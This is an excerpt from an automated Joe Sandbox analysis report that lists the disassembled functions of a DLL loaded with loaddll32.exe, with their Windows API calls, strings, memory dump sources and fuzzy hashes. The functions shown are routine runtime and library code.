assertion failed: key != c::TLS_OUT_OF_INDEXESC:nzjojbotqasycnkljdteylasxmjqphnrtuuxvfwvaplwzgzyritzjhhjbshfvmfwyjcjnfnfvmrvjottrwutfjgifoertqrccfhqlnovkbhlvalwmitqmxbhveuriecxxgeiiftdxvx, xrefs: 6ECD2A38

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: AllocExclusiveHeapLock$AcquireProcessRelease
String ID: assertion failed: key != c::TLS_OUT_OF_INDEXESC:nzjojbotqasycnkljdteylasxmjqphnrtuuxvfwvaplwzgzyritzjhhjbshfvmfwyjcjnfnfvmrvjottrwutfjgifoertqrccfhqlnovkbhlvalwmitqmxbhveuriecxxgeiiftdxvx
API String ID: 3228198226-3009553730
Opcode ID: 92223a0ed426d76191a3fd2cb1ecba0f73d98c1d8d39e9e13aaf44c354d689ce
Instruction ID: 9b3f04a42349955b66bd13770d668a23afe78f602d2ab4864f73d11e1c300725
Opcode Fuzzy Hash: 92223a0ed426d76191a3fd2cb1ecba0f73d98c1d8d39e9e13aaf44c354d689ce
Instruction Fuzzy Hash: 884169B19003098FEB14CFE4D855BDEBBB4FB44314F204129EA19AB784EB759849CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE42BC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,6ECE43C9,FFFDC801,00000400,?,00000000,00000001,?,6ECE4542,00000021,FlsSetValue,6ED16BF8,6ED16C00,?), ref: 6ECE437D

Strings

api-ms-, xrefs: 6ECE4313
ext-ms-, xrefs: 6ECE4327

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 8bc95cc09bc40b27e477b72a9dff054e9e980b2d94e7df502eb7827c7485be32
Instruction ID: a4d0d6aa3ec8c4b65598d19f78077e2cda87fc08ff4eac2921f4489daaf48940
Opcode Fuzzy Hash: 8bc95cc09bc40b27e477b72a9dff054e9e980b2d94e7df502eb7827c7485be32
Instruction Fuzzy Hash: 10210636A44611ABDB119BA5DC45A9E7778FB863B0F110160ED26A7F84F730ED07C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 6ECDF3BF, Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6ECDF101,6ECDCFA2,6ECDC7AC,?,6ECDC9E4,?,00000001,?,?,00000001,?,6ED1AFA8,0000000C,6ECDCADD), ref: 6ECDF3CD
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6ECDF3DB
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6ECDF3F4
SetLastError.KERNEL32(00000000,6ECDC9E4,?,00000001,?,?,00000001,?,6ED1AFA8,0000000C,6ECDCADD,?,00000001,?), ref: 6ECDF446

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 0b6833560395c8a6cc657212b13a64e41cd6a43fe9cc7cd86b28c8819748461d
Instruction ID: ee6a3900db8dd8b731893077ccf3b5858ec9b78c1f908b20cf955e924ec1c97c
Opcode Fuzzy Hash: 0b6833560395c8a6cc657212b13a64e41cd6a43fe9cc7cd86b28c8819748461d
Instruction Fuzzy Hash: 8E01D832119B225EFA612AF56C8659736F9FB46379730062AEA20446D8FF53480BD584

Uniqueness

Uniqueness Score: -1.00%

Function 6ECDBE60, Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6ECDC510: GetTickCount64.KERNEL32 ref: 6ECDC517

GetTickCount64.KERNEL32 ref: 6ECDBE96
GetTickCount64.KERNEL32 ref: 6ECDBEB4
GetTickCount64.KERNEL32 ref: 6ECDBECD
GetTickCount64.KERNEL32 ref: 6ECDBECF
GetTickCount64.KERNEL32 ref: 6ECDBED6
GetTickCount64.KERNEL32 ref: 6ECDBEF4

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: Count64Tick
String ID:
API String ID: 1927824332-0
Opcode ID: d458593e7b095f0b418a6e28b756af0473555856244e0491d6b7eaee0544c54d
Instruction ID: ee6dade06aa4f6ebc5af0e70f976716732fb8ce89007629cd77c237ca4fd17e3
Opcode Fuzzy Hash: d458593e7b095f0b418a6e28b756af0473555856244e0491d6b7eaee0544c54d
Instruction Fuzzy Hash: C9018022C20E188DE203BA79984254AAABD5F973E0B158713D10637406FF9114E793D1

Uniqueness

Uniqueness Score: -1.00%

Function 6ECC6B40, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6ECC6C1B
__aulldiv.LIBCMT ref: 6ECC6C2B

Strings

_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool, xrefs: 6ECC6BAA, 6ECC6BE5
'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6ECC6B54
{invalid syntax}, xrefs: 6ECC6B84

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: __aulldiv__aullrem
String ID: 'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool${invalid syntax}
API String ID: 3839614884-2364648981
Opcode ID: 9cafb5d6eae1f4158fe221f8d5b9b79ef32d97d6fc86569a171af4dda56820a4
Instruction ID: c37332a36eb8fb00331fb462496b017cbeadc4b14d5840d6b513f2cbfeaac05d
Opcode Fuzzy Hash: 9cafb5d6eae1f4158fe221f8d5b9b79ef32d97d6fc86569a171af4dda56820a4
Instruction Fuzzy Hash: FE4165307182104BD3149EADD950B3AB2E5DF84F14F24483EEA89CB3C6F665C8568393

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCD000, Relevance: 8.8, APIs: 7, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000001,6ECCC746), ref: 6ECCD00B
TlsGetValue.KERNEL32(00000000,00000001,6ECCC746), ref: 6ECCD023
TlsGetValue.KERNEL32(00000000), ref: 6ECCD043
TlsGetValue.KERNEL32(00000000), ref: 6ECCD063
GetProcessHeap.KERNEL32 ref: 6ECCD076
HeapAlloc.KERNEL32(00A40000,00000000,0000000C), ref: 6ECCD089
TlsSetValue.KERNEL32(00000000,00000000,00A40000,00000000,0000000C), ref: 6ECCD0B6

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: Value$Heap$AllocProcess
String ID:
API String ID: 3559649508-0
Opcode ID: 18060bd777f1ccaeab538743b3c772e69c15fd10ff61dd07404d6e426ba833e4
Instruction ID: 07e4577aae0da07f1c77ecb751ba8a1d9fde58591a074961584cfd4aeb67a329
Opcode Fuzzy Hash: 18060bd777f1ccaeab538743b3c772e69c15fd10ff61dd07404d6e426ba833e4
Instruction Fuzzy Hash: 8E11B770680601CBFB504FF9D864F963AE8AB82A41F000C58D926DB784FB36D847CF66

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE3571, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6ECE358D

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SYSTEM32\loaddll32.exe
API String ID: 0-1872383224
Opcode ID: aedef4f38761ea9d63307bf54155e97077cf6481405e718b42f605c9ee3c4145
Instruction ID: 93c8ed8df4c4f4203999a8245977f1bf473fd50e12b87df584824f77785d6929
Opcode Fuzzy Hash: aedef4f38761ea9d63307bf54155e97077cf6481405e718b42f605c9ee3c4145
Instruction Fuzzy Hash: 3F218E71604205AFD7009FFEC84899E77BDFF813687014928E8158BA64FB30F81487A4

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE0422, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,6ECE04E3,00000000,?,00000001,00000000,?,6ECE055A,00000001,FlsFree,6ED16184,FlsFree,00000000), ref: 6ECE04B2

Strings

api-ms-, xrefs: 6ECE0472

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: fcd6753d4040e68235a66d255fcc70f57ec032127546dfdd0fe5f3bf12637093
Instruction ID: dff8ad5984687c55cd77566979fa44ac94137c236bbdf0d388c56776a2affb6d
Opcode Fuzzy Hash: fcd6753d4040e68235a66d255fcc70f57ec032127546dfdd0fe5f3bf12637093
Instruction Fuzzy Hash: 0111CA31A44B25AFDF528BA98D4674D37B4AF42770F114120FD25EBA84FB70ED0186D5

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE12ED, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,D634436F,00000000,?,00000000,6ECE9B33,000000FF,?,6ECE127D,?,?,6ECE1251,?), ref: 6ECE1322
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6ECE1334
FreeLibrary.KERNEL32(00000000,?,00000000,6ECE9B33,000000FF,?,6ECE127D,?,?,6ECE1251,?), ref: 6ECE1356

Strings

mscoree.dll, xrefs: 6ECE131B
CorExitProcess, xrefs: 6ECE132C

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 02e43d48bc0ec79aec2e440577bd7dae8adb0c72c7be6630dd7f7ac87706b73d
Instruction ID: 91041e7b39ccd2fec03857f12925a0612fdeefeea3e44560961bdbb2a97ba789
Opcode Fuzzy Hash: 02e43d48bc0ec79aec2e440577bd7dae8adb0c72c7be6630dd7f7ac87706b73d
Instruction Fuzzy Hash: B101A232904959EFDF018F94CD05FBEBBB8FB44711F004525F822A2B80DB749904CA90

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCC2C0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll), ref: 6ECCC2C5
GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 6ECCC2D5

Strings

ntdll, xrefs: 6ECCC2C0
NtWaitForKeyedEvent, xrefs: 6ECCC2CF

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: NtWaitForKeyedEvent$ntdll
API String ID: 1646373207-2815205136
Opcode ID: 64a3cc9e4df8924193b2efc21b7a722321ee51fd20100893eb4bd02a40518f87
Instruction ID: f6b72932969f561c9df40df06526e722c1568861f56740eb0836fc6f236bb9f5
Opcode Fuzzy Hash: 64a3cc9e4df8924193b2efc21b7a722321ee51fd20100893eb4bd02a40518f87
Instruction Fuzzy Hash: 61B092B1E087026EAE907BF15B0CAA63A38A9E16913410480A027D9100EA248014D962

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCC2E0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll), ref: 6ECCC2E5
GetProcAddress.KERNEL32(00000000,NtReleaseKeyedEvent), ref: 6ECCC2F5

Strings

ntdll, xrefs: 6ECCC2E0
NtReleaseKeyedEvent, xrefs: 6ECCC2EF

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: NtReleaseKeyedEvent$ntdll
API String ID: 1646373207-31681898
Opcode ID: 9957c5e063760ce3f01f47381a15c46ab6c2441e77f304b53e51a86ef295be60
Instruction ID: afd82babb80a2703b01a8c554145b097656ff8386a914fcc0796e65b64e7b599
Opcode Fuzzy Hash: 9957c5e063760ce3f01f47381a15c46ab6c2441e77f304b53e51a86ef295be60
Instruction Fuzzy Hash: 40B092B1E086066AAE607BF15B0CAA63938A9D16823010440A033E9104FA248014D922

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCC280, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6ECCC285
GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 6ECCC295

Strings

kernel32, xrefs: 6ECCC280
SetThreadDescription, xrefs: 6ECCC28F

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: SetThreadDescription$kernel32
API String ID: 1646373207-1950310818
Opcode ID: 118311e46f3e5081e81fb2c7de4722d3df894f26bafca0506f7c9a26365bf5e9
Instruction ID: 4dd702a268873f153415186dece9ae5da4bbe84d04284eaaca022725816d21ad
Opcode Fuzzy Hash: 118311e46f3e5081e81fb2c7de4722d3df894f26bafca0506f7c9a26365bf5e9
Instruction Fuzzy Hash: 9DB092B1E486026FAE607FF15A2CAA63A38A9D56C13010440F027D9101EA348014E972

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCC260, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6ECCC265
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6ECCC275

Strings

GetSystemTimePreciseAsFileTime, xrefs: 6ECCC26F
kernel32, xrefs: 6ECCC260

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetSystemTimePreciseAsFileTime$kernel32
API String ID: 1646373207-392834919
Opcode ID: c17f9a06ba9e75336f6acc6b4569ced744d34e5d422979629225f15f9c57d7fd
Instruction ID: 5b57f5a34bbdb7e81e078fc8f4ae00d5f8788029c5d663db26797f1d27d5129d
Opcode Fuzzy Hash: c17f9a06ba9e75336f6acc6b4569ced744d34e5d422979629225f15f9c57d7fd
Instruction Fuzzy Hash: 9DB092B1E086016BAE607FF19B5CAA63938A9D66813024840F123D9104EA24C064EA22

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCC300, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll), ref: 6ECCC305
GetProcAddress.KERNEL32(00000000,NtCreateKeyedEvent), ref: 6ECCC315

Strings

ntdll, xrefs: 6ECCC300
NtCreateKeyedEvent, xrefs: 6ECCC30F

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: NtCreateKeyedEvent$ntdll
API String ID: 1646373207-1373576770
Opcode ID: 6974c76fa4d607e59086c8f2659021f2519dbf61f5c4641ffc79a23e1ec552c9
Instruction ID: 6d4da3ee1f8e06a22a7ad5b38123f3f21ae9d6717abd51a70e8e9d76981c717f
Opcode Fuzzy Hash: 6974c76fa4d607e59086c8f2659021f2519dbf61f5c4641ffc79a23e1ec552c9
Instruction Fuzzy Hash: A6B092B1E086016EAE50BBF16B0CAE63938A9E16C23414440A033E9206EA248015D922

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE6749, Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(D634436F,?,00000000,?), ref: 6ECE67AC

Part of subcall function 6ECE4073: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6ECE61E2,?,00000000,-00000008), ref: 6ECE411F

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6ECE6A07
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6ECE6A4F
GetLastError.KERNEL32 ref: 6ECE6AF2

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 3df33aa991684aa5738fb39ce7dcc3d2529502c611a7fc4b81bef8c303c6c9c7
Instruction ID: e36a002f568be19a4444eead0784c62a56c1a98ac23457251669479d6d813db9
Opcode Fuzzy Hash: 3df33aa991684aa5738fb39ce7dcc3d2529502c611a7fc4b81bef8c303c6c9c7
Instruction Fuzzy Hash: 83D16A75D206599FDF01CFE8C8809EDBBB4FF49314F18852AE966AB641E730A852CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6ECD2470, Relevance: 6.2, APIs: 4, Instructions: 215COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 6ECD2601
WriteConsoleW.KERNEL32(?,?,00000001,?,00000000,?,?,?), ref: 6ECD2653
GetLastError.KERNEL32(?,?,?), ref: 6ECD265D
GetLastError.KERNEL32(?,?,?), ref: 6ECD26C5

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: ConsoleErrorLastWrite
String ID:
API String ID: 4006445483-0
Opcode ID: c114241d7b11ecd041e06e252ccd7e66f3cc4f2e48e48222ab3f8feaa78e960a
Instruction ID: d2a995d33cf4078d8099769910f7e55f42883a26c34eb430720dc4792cb027ae
Opcode Fuzzy Hash: c114241d7b11ecd041e06e252ccd7e66f3cc4f2e48e48222ab3f8feaa78e960a
Instruction Fuzzy Hash: 8D615B71A083158BE7198E96CC70B6EB7A2EBC5314F048939EA95C73C8F672C84AD651

Uniqueness

Uniqueness Score: -1.00%

Function 6ECDF49F, Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6ECDF566
___AdjustPointer.LIBCMT ref: 6ECDF589
___AdjustPointer.LIBCMT ref: 6ECDF625

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 78fbf0ed318755210473d8bf709bb8ec2763b9c655e01633b3cd131deb495923
Instruction ID: b63a3067d9ee32072dd2216a7903a3d14be520375a1431467eaa18c4d0bef836
Opcode Fuzzy Hash: 78fbf0ed318755210473d8bf709bb8ec2763b9c655e01633b3cd131deb495923
Instruction Fuzzy Hash: 2E51D172605683AFEB158F91E850BBA77A4FF04314F300529EE1587694FB33E849CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE2D87, Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 6ECE4073: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6ECE61E2,?,00000000,-00000008), ref: 6ECE411F

GetLastError.KERNEL32 ref: 6ECE2DEB
__dosmaperr.LIBCMT ref: 6ECE2DF2
GetLastError.KERNEL32(?,?,?,?), ref: 6ECE2E2C
__dosmaperr.LIBCMT ref: 6ECE2E33

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
